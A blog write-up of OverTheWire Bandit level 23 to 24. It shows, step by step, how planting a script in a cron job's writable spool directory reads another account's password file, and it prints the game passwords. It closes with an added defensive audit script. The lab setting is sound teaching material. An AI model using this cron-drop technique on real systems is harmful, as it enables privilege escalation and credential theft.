[Bandit-OverTheWire] Level 23 -> Level 24

두비니 · 2020. 9. 25. 08:02

 

 

Bandit Level 23 → Level 24

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Commands you may need to solve this level

cron, crontab, crontab(5) (use “man 5 crontab” to access this)

 

 

Connecting

Connect: ssh bandit23@bandit.labs.overthewire.org -p2220
pw : jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

 

bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh 
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

 

According to the code, every script in /var/spool/bandit24 is executed (with a 60-second timeout) and then deleted.

So, before it gets deleted, let's have it copy the contents of /etc/bandit_pass/bandit24.

 

bandit23@bandit:~$ mkdir -p /tmp/dubini2
bandit23@bandit:~$ cd /tmp/dubini2
bandit23@bandit:/tmp/dubini2$ cat dump.sh
cat: dump.sh: No such file or directory
bandit23@bandit:/tmp/dubini2$ cat > dump.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/dubini2/bandit_pass

^C                                     
bandit23@bandit:/tmp/dubini2$ chmod 777 dump.sh
bandit23@bandit:/tmp/dubini2$ chmod 777 /tmp/dubini2
bandit23@bandit:/tmp/dubini2$ cp dump.sh /var/spool/bandit24/
bandit23@bandit:/tmp/dubini2$ 
bandit23@bandit:/tmp/dubini2$ cat bandit_pass
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

 

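That is all it takes, but let me explain briefly.

First, I create my own folder under /tmp and write dump.sh, a script that copies the bandit24 password into my folder.

Then, because of write-permission issues (the script runs as bandit24 and has to write into my directory), I grant permissions on the directory and the file,

and finally I copy dump.sh to /var/spool/bandit24.

After that, you can see that the password has been copied.

Done!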
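
From the defender's side, the pattern in this level is a cron job that runs as one account and executes files dropped into a directory that other users can write to. The shell functions below are an added example, not part of the original post or of the OverTheWire game: they list the run-as user and command of each /etc/cron.d-style entry and report a drop directory that is world-writable or holds files owned by someone other than the run-as user. The function names and temporary paths are assumptions; the input is the cron lines shown above plus a constructed directory.

```sh
#!/bin/sh
# Added example (not from the original post): audit helpers for a cron job that
# executes files from a drop directory. Function names are hypothetical.

# cron_d_entries FILE: print "user<TAB>command" for every job line in an
# /etc/cron.d-style file (five time fields or one @keyword, then user, then command).
cron_d_entries() {
    file=$1
    while IFS= read -r line; do
        set -f; set -- $line; set +f   # split on whitespace without expanding "*"
        case ${1-} in
            ''|'#'*) continue ;;                     # blank line or comment
            @*) [ $# -ge 3 ] || continue ;;          # @reboot user command
            *)  [ $# -ge 7 ] || continue; shift 4 ;; # m h dom mon dow user command
        esac
        printf '%s\t%s\n' "$2" "$3"
    done < "$file"
}

# drop_dir_findings DIR RUNAS: print one finding per line for a directory whose
# files a job running as RUNAS will execute; return 0 if anything was found.
drop_dir_findings() {
    dir=$1 runas=$2 found=1
    if [ -n "$(find "$dir" -prune -perm -0002 -print)" ]; then
        echo "world-writable: $dir"; found=0
    fi
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$f" ] || continue
        owner=$(ls -ld "$f" | awk 'NR == 1 { print $3 }')
        if [ "$owner" != "$runas" ]; then
            echo "foreign-file: ${f##*/} owner=$owner"; found=0
        fi
    done
    return "$found"
}

# Demo: the cron.d lines shown above, plus a constructed throwaway directory.
tmp=$(mktemp -d)
printf '%s\n' '@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null' \
    '* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null' > "$tmp/cronjob"
mkdir "$tmp/spool" && chmod 777 "$tmp/spool" && : > "$tmp/spool/dump.sh"
cron_d_entries "$tmp/cronjob" | sort -u
drop_dir_findings "$tmp/spool" bandit24
rm -rf "$tmp"
```

The world-writable test only looks at the "other" write bit; a directory opened to specific users through group membership or ACLs needs a separate check.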